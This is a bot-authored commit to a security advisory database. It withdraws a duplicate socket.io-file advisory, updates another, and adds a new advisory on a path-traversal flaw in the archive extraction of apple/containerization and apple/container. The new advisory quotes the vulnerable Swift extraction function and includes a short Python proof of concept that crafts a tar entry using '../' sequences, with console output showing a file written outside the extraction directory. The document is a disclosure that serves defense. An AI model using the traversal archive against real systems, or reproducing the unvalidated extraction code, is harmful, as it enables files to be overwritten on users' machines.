Publish Advisories

GHSA-6495-8jvh-f28x
GHSA-r2gr-fhmr-66c5
GHSA-cq3j-qj2h-6rv3

Author: advisory-database[bot]

advisories/github-reviewed/2020/10/GHSA-6495-8jvh-f28x/GHSA-6495-8jvh-f28x.json

@@ -1,9 +1,11 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-6495-8jvh-f28x",
-  "modified": "2021-10-04T21:23:14Z",
+  "modified": "2026-01-22T22:29:16Z",
   "published": "2020-10-02T15:39:54Z",
-  "aliases": [],
+  "aliases": [
+    "CVE-2020-24807"
+  ],
   "summary": "File restriction bypass in socket.io-file",
   "details": "All versions of `socket.io-file`are vulnerable to a file restriction bypass. The validation for valid file types only happens on the client-side, which allows an attacker to intercept the Websocket request post-validation and alter the `name` value to upload any file types.\n\nNo fix is currently available. Consider using an alternative package until a fix is made available.",
   "severity": [

advisories/github-reviewed/2021/05/GHSA-r2gr-fhmr-66c5/GHSA-r2gr-fhmr-66c5.json

@@ -1,13 +1,12 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-r2gr-fhmr-66c5",
-  "modified": "2021-04-21T21:00:03Z",
+  "modified": "2026-01-22T22:29:07Z",
   "published": "2021-05-10T18:38:11Z",
-  "aliases": [
-    "CVE-2020-24807"
-  ],
-  "summary": "\"Arbitrary code execution in socket.io-file\"",
-  "details": "\"The socket.io-file package through 2.0.31 for Node.js relies on client-side validation of file types, which allows remote attackers to execute arbitrary code by uploading an executable file via a modified JSON name field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\"",
+  "withdrawn": "2026-01-22T22:29:07Z",
+  "aliases": [],
+  "summary": "Duplicate Advisory: \"Arbitrary code execution in socket.io-file\"",
+  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-6495-8jvh-f28x. This link is maintained to preserve external references.\n\n## Original Description\n\"The socket.io-file package through 2.0.31 for Node.js relies on client-side validation of file types, which allows remote attackers to execute arbitrary code by uploading an executable file via a modified JSON name field. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.\"",
   "severity": [
     {
       "type": "CVSS_V3",

advisories/github-reviewed/2026/01/GHSA-cq3j-qj2h-6rv3/GHSA-cq3j-qj2h-6rv3.json

@@ -0,0 +1,86 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-cq3j-qj2h-6rv3",
+  "modified": "2026-01-22T22:30:05Z",
+  "published": "2026-01-22T22:30:05Z",
+  "aliases": [
+    "CVE-2026-20613"
+  ],
+  "summary": "Container and Containerization archive extraction does not guard against escapes from extraction base directory.",
+  "details": "### Summary\nThe `ArchiveReader.extractContents()` function used by `cctl image load` and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames.\n\n### Details\n\nThe code in question is: https://github.com/apple/containerization/blob/main/Sources/ContainerizationArchive/Reader.swift#L180.\n\n```swift\n    /// Extracts the contents of an archive to the provided directory.\n    /// Currently only handles regular files and directories present in the archive.\n    public func extractContents(to directory: URL) throws {\n        let fm = FileManager.default\n        var foundEntry = false\n        for (entry, data) in self {\n            guard let p = entry.path else { continue }\n            foundEntry = true\n            let type = entry.fileType\n            let target = directory.appending(path: p)\n            switch type {\n            case .regular:\n                try data.write(to: target, options: .atomic)\n            case .directory:\n                try fm.createDirectory(at: target, withIntermediateDirectories: true)\n            case .symbolicLink:\n                guard let symlinkTarget = entry.symlinkTarget, let linkTargetURL = URL(string: symlinkTarget, relativeTo: target) else {\n                    continue\n                }\n                try fm.createSymbolicLink(at: target, withDestinationURL: linkTargetURL)\n            default:\n                continue\n            }\n            chmod(target.path(), entry.permissions)\n            if let owner = entry.owner, let group = entry.group {\n                chown(target.path(), owner, group)\n            }\n        }\n        guard foundEntry else {\n            throw ArchiveError.failedToExtractArchive(\"no entries found in archive\")\n        }\n    }\n```\n\n### PoC\n\nSample script `make-evil-tar.py`:\n\n```python\n#! /usr/bin/env python3\n\nimport tarfile\nimport io\nimport time\n\ntar_path = \"evil.tar\"\n\n# Content of the file inside the tar\npayload = b\"pwned\\n\"\n\nwith tarfile.open(tar_path, \"w\") as tar:\n    info = tarfile.TarInfo(\n        name=\"../../../../../../../../../../../tmp/pwned.txt\"\n    )\n    info.size = len(payload)\n    info.mtime = int(time.time())\n    info.mode = 0o644\n\n    tar.addfile(info, io.BytesIO(payload))\n\nprint(f\"Created {tar_path}\")\n```\n\n\n```console\n% ./make-evil-tar.py\nCreated evil.tar\n% mv evil.tar /tmp\n% cd /tmp\n% ls pwned.txt\nls: pwned.txt: No such file or directory\n% ~/projects/jglogan/containerization/bin/cctl images load -i evil.tar\nError: notFound: \"/var/folders/6k/tnyh0vfd07z0f9mr5cg7zs5r0000gn/T/8493984C-33AE-44BB-91BB-AE486F3095FC/oci-layout\"\n% cat pwned.txt \npwned\n```\n\n### Impact\n\nAffects users of `cctl image load` in the containerization project, and any projects that depend on containerization and use the `extractContent()` function.\n\nAffects users of `container image load` in the container project.\n\nThese operations can extract a file into any user-writable location on the system using carefully chosen pathnames. This advisory is **not** a privilege escalation, the affected files can only be written to already user-writable locations.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "SwiftURL",
+        "name": "github.com/apple/containerization"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.21.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.20.1"
+      }
+    },
+    {
+      "package": {
+        "ecosystem": "SwiftURL",
+        "name": "github.com/apple/container"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.8.0"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.7.1"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/apple/containerization/commit/3e93416b9a6d7b4c25fff7e9dea22a9ca687ee52"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/apple/containerization"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22"
+    ],
+    "severity": "LOW",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-01-22T22:30:05Z",
+    "nvd_published_at": null
+  }
+}